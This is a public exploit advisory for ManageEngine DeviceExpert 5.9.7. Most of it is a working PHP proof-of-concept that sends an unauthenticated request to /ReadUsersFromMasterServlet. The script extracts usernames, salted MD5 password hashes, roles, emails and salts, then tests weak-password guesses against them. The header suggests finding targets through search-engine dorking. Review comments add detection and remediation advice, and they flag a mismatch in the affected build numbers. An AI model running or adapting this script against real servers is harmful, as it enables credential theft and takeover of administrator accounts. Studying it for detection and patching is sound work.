Headline
ManageEngine DeviceExpert 5.9.7 Build 5970 Hash Disclosure
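ManageEngine DeviceExpert version 5.9.7 build 5970 discloses usernames and salted MD5 password hashes. The proof of concept below reads them from the /ReadUsersFromMasterServlet endpoint with a request that carries no credentials.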
====================================================================================================================================
| # Title : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://manageengine.com/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.
[+] LIne 87 set your targer .
[+] usage : C:\www\test>php 3.php
[+] Payload :
<?php
/**
 * Proof-of-concept client for the DeviceExpert user-record disclosure.
 *
 * Sends one GET to /ReadUsersFromMasterServlet on the configured host
 * (default port 6060 over HTTPS) and parses every <discoverydata> record
 * in the reply for username, Base64-encoded password hash, role, e-mail
 * address and salt.
 *
 * Review notes for defenders:
 *  - The request carries no cookie, token or credentials. A reply that
 *    contains <discoverydata> therefore means the servlet answered an
 *    unauthenticated caller.
 *  - Requests for /ReadUsersFromMasterServlet in the product's web access
 *    log, or at a reverse proxy in front of it, are the observable trace
 *    of this script. Presumably only a paired DeviceExpert server should
 *    ever call it (inferred from the servlet name; confirm with vendor
 *    documentation).
 *  - The check in parseUserData() models the stored value as
 *    md5(password . salt), a single fast hash. If the endpoint was
 *    reachable from an untrusted network, treat every account password
 *    as exposed and rotate it. Restrict access to the management port
 *    and move to a fixed vendor release if one is available.
 *  - NOTE(review): the headline names 5.9.7 build 5970 while the PoC
 *    notes say "5.9 build 5980 and prior"; confirm the affected range
 *    against the vendor advisory.
 */
class ManageEngineDeviceExpert {
    // Target host name or IP address, as passed to the constructor.
    private $host;
    // TCP port of the web interface (constructor default: 6060).
    private $port;
    // true selects the https:// scheme, false selects http://.
    private $ssl;

    /**
     * Stores the connection parameters; no network activity happens here.
     *
     * @param string $host Host name or IP address of the server.
     * @param int    $port Web interface port, 6060 by default.
     * @param bool   $ssl  Use HTTPS when true (the default).
     */
    public function __construct($host, $port = 6060, $ssl = true) {
        $this->host = $host;
        $this->port = $port;
        $this->ssl = $ssl;
    }

    /**
     * Performs a GET for $path and returns the response body.
     *
     * No headers, cookies or credentials are attached to the request.
     *
     * @param string $path Absolute path appended after host:port.
     * @return string|false Response body, or false when curl_exec() fails.
     */
    private function sendRequest($path) {
        $url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path;
        $ch = curl_init($url);
        // Return the body as a string instead of printing it.
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    /**
     * Requests the user export and splits it into <discoverydata> records.
     *
     * @return array|null Matched <discoverydata>...</discoverydata> strings,
     *                    or null when the request fails or no record is found.
     */
    public function getUsers() {
        echo "Reading users from master...\n";
        $response = $this->sendRequest('/ReadUsersFromMasterServlet');
        // Loose check: a failed transfer (false) and an empty body both
        // end up here and are reported the same way.
        if (!$response) {
            echo "Connection failed\n";
            return null;
        }
        if (strpos($response, '<discoverydata>') !== false) {
            preg_match_all('/<discoverydata>(.*?)<\/discoverydata>/', $response, $matches);
            echo "Found " . count($matches[0]) . " users\n";
            return $matches[0];
        } else {
            echo "Could not find any users\n";
            return null;
        }
    }

    /**
     * Extracts the fields of one user record and tests a short guess list.
     *
     * The guess list holds three fixed strings plus the account's own
     * username. An account recovered this way needs no offline cracking
     * at all, which is the argument for rejecting such values in the
     * product's password policy.
     *
     * @param string $user One <discoverydata> record.
     * @return array|null Keys: username, password (null when no guess
     *                    matched), hash (hex), role, email, salt. Returns
     *                    null for an empty record.
     */
    public function parseUserData($user) {
        if (!$user) return null;
        preg_match('/<username>([^<]+)<\/username>/', $user, $username);
        preg_match('/<password>([^<]+)<\/password>/', $user, $encoded_hash);
        preg_match('/<userrole>([^<]+)<\/userrole>/', $user, $role);
        preg_match('/<emailid>([^<]+)<\/emailid>/', $user, $email);
        preg_match('/<saltvalue>([^<]+)<\/saltvalue>/', $user, $salt);
        // The <password> element is Base64; decoding yields the raw digest,
        // shown as hex further down.
        $hash = base64_decode($encoded_hash[1]);
        $password = null;
        $weak_passwords = ['12345', 'admin', 'password', $username[1]];
        foreach ($weak_passwords as $weak_password) {
            // NOTE(review): loose == on two hex strings. PHP compares
            // numeric-looking strings such as "0e..." as numbers, so a
            // reported match can be a false positive; === or hash_equals()
            // is the correct comparison for digests.
            if (md5($weak_password . $salt[1]) == bin2hex($hash)) {
                $password = $weak_password;
                break;
            }
        }
        return [
            'username' => $username[1],
            'password' => $password,
            'hash' => bin2hex($hash),
            'role' => $role[1],
            'email' => $email[1],
            'salt' => $salt[1]
        ];
    }

    /**
     * Fetches all user records and prints each parsed field to stdout.
     *
     * Returns without output beyond the status lines when getUsers()
     * yields nothing.
     */
    public function run() {
        $users = $this->getUsers();
        if (!$users) return;
        foreach ($users as $user) {
            $user_data = $this->parseUserData($user);
            if (!$user_data) continue;
            echo "User: " . $user_data['username'] . "\n";
            echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n";
            echo "Hash: " . $user_data['hash'] . "\n";
            echo "Role: " . $user_data['role'] . "\n";
            echo "Email: " . $user_data['email'] . "\n";
            echo "Salt: " . $user_data['salt'] . "\n";
            echo "----------------------------\n";
        }
    }
}
// Using the class
$deviceExpert = new ManageEngineDeviceExpert('127.0.0.1');
$deviceExpert->run();
?>
Greetings to :
==================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |
================================================================